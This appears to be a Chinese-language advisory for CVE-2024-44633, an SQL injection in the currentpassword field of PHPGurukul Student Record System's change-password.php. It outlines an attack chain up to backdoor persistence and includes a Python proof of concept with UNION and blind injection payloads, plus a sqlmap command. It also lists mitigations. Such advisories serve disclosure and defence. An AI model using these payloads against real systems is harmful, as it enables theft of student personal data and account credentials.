CVE-2024-44633 PHPGurukul学生记录系统change-password.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2024-44633

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Student Record System 3.20

漏洞概述

CVE-2024-44633是PHPGurukul学生记录系统3.20版本中存在的一个中等严重性安全漏洞。该漏洞位于change-password.php文件中的currentpassword参数，由于对用户输入缺乏有效的过滤和验证，攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。未经身份验证的远程攻击者可以利用此漏洞绕过正常的安全机制，直接与后端数据库进行交互。成功利用该漏洞可能导致敏感数据泄露，包括用户账户信息、密码哈希值、学生个人数据等机密信息。此外，攻击者还可能通过SQL注入获取数据库管理权限，进而对整个系统进行完全控制。对于运行该系统的教育机构和企业而言，该漏洞构成了严重的安全威胁，因为学生记录系统通常存储大量敏感的个人身份信息和学业数据。攻击者利用获取的数据可进行身份盗窃、欺诈等进一步恶意活动，对用户隐私和机构声誉造成重大损害。建议相关单位尽快采取修复措施，防止漏洞被恶意利用。

技术细节

该SQL注入漏洞存在于PHPGurukul学生记录系统的密码修改功能模块中，具体位于change-password.php文件。漏洞的根本原因在于程序对currentpassword参数的处理方式不当，直接将用户提交的参数值拼接到SQL查询语句中，而未进行充分的输入验证和SQL语句参数化处理。攻击者可以通过HTTP POST请求向change-password.php页面发送精心构造的currentpassword参数值，该值包含恶意的SQL代码片段。当服务器执行包含恶意代码的SQL语句时，攻击者注入的SQL命令将被数据库引擎解释执行。由于该参数在密码修改流程中用于验证用户身份，攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术从数据库中提取敏感信息，包括管理员账户凭据、用户密码哈希值以及其他存储在数据库中的机密数据。在某些配置下，攻击者甚至可能通过 INTO OUTFILE 或 LOAD_FILE 等SQL语句实现系统文件读写操作，进一步扩大攻击面。该漏洞的利用不需要任何预先身份认证，攻击者只需构造特定的HTTP请求即可触发漏洞，对系统的机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者首先识别目标网站使用的PHPGurukul学生记录系统版本，确认其为3.20版本，并定位change-password.php入口点

STEP 2

步骤2

漏洞探测：攻击者构造包含SQL注入代码的currentpassword参数值，通过HTTP POST请求发送到change-password.php，测试漏洞是否存在

STEP 3

步骤3

注入验证：利用UNION注入或布尔盲注技术验证SQL注入漏洞，确认可成功注入恶意SQL语句并获取数据库响应

STEP 4

步骤4

数据提取：使用sqlmap等自动化工具或手动构造SQL语句，通过注入点提取数据库中的敏感信息，包括用户表、密码哈希、管理员账户等

STEP 5

步骤5

权限提升：如数据库配置不当，攻击者可能通过SQL注入获取数据库管理员权限，进一步控制整个系统

STEP 6

步骤6

持久化控制：利用获取的凭据登录系统后台，植入后门程序或修改现有功能，实现长期持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2024-44633 SQL Injection PoC
# Target: PHPGurukul Student Record System 3.20
# Vulnerable Parameter: currentpassword in change-password.php

target_url = "http://target-host/student-record-system/change-password.php"

# SQL Injection payload using UNION-based injection
payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32---"

data = {
    'currentpassword': payload,
    'newpassword': 'test123',
    'confirmpassword': 'test123'
}

print("[*] Sending SQL Injection payload...")
print(f"[*] Target: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[+] Response Status Code: {response.status_code}")
    
    # Check for signs of successful injection
    if 'UNION' in response.text or 'SELECT' in response.text:
        print("[!] Potential SQL Injection detected - check response")
    
    # Boolean-based blind injection check
    true_payload = "' AND 1=1---"
    false_payload = "' AND 1=2---"
    
    data_true = {'currentpassword': true_payload, 'newpassword': 'test', 'confirmpassword': 'test'}
    data_false = {'currentpassword': false_payload, 'newpassword': 'test', 'confirmpassword': 'test'}
    
    resp_true = requests.post(target_url, data=data_true, timeout=10)
    resp_false = requests.post(target_url, data=data_false, timeout=10)
    
    if len(resp_true.text) != len(resp_false.text):
        print("[!] Blind SQL Injection confirmed!")
        print("[*] Use sqlmap for further exploitation")
        
except requests.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

# Recommended sqlmap command:
# sqlmap -u "http://target/change-password.php" --data="currentpassword=*&newpassword=test&confirmpassword=test" --level=5 --risk=3 -p currentpassword

影响范围

PHPGurukul Student Record System 3.20

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1）通过Web应用防火墙规则暂时阻止对change-password.php的访问或对currentpassword参数进行严格过滤；2）修改Web服务器配置，禁止该文件被外部直接访问；3）在应用层代码中临时添加输入验证逻辑，对currentpassword参数进行SQL关键字过滤和特殊字符转义；4）限制数据库账户权限，防止SQL注入导致的数据泄露和未授权操作；5）启用详细的访问日志监控，及时发现和响应异常的SQL注入攻击尝试。建议同时准备系统备份，以便在紧急情况下快速恢复服务。